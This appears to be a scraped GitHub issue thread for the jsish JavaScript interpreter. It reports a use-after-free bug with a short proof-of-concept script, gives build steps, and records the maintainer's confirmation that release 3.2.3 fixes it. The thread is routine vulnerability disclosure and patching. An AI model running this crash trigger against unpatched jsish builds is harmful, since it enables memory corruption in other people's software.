Comments (4)
PoC
var global = this;
(function () {
    try {
        throw function () {
            this.global = 'test';
        };
    } catch (e) {
    }
}());
this.global = 'test'; // trigger use after free
from jsish.
Great find of problem from code that was supposed to be removed a long time ago. Fixed in Release "3.2.3"
from jsish.
Great find of problem from code that was supposed to be removed a long time ago. Fixed in Release "3.2.3"
The source code I use is http://jsish.org/zip
Build Environment
Ubuntu 16.04 x86_64
wget http://jsish.org/zip -O jsi.zip && unzip jsi.zip && cd jsi && make
from jsish.
I probably wasn't clear. I meant yes you did find a problem.
But it should be fixed now, in the code I just committed today for "3.2.3".
$ jsish -v
3.2.3 3.0203 84f5b80e64d1abdcf634e27cb6b86dce8e8c87ed 2020-10-14 00:32:37 UTC
$ jsish /tmp/glob.jsi
$ cat /tmp/glob.jsi
var global = this;
(function () {
    try {
        throw function () {
            this.global = 'test';
        };
    } catch (e) {
    }
}());
this.global = 'test'; // trigger use after free
from jsish.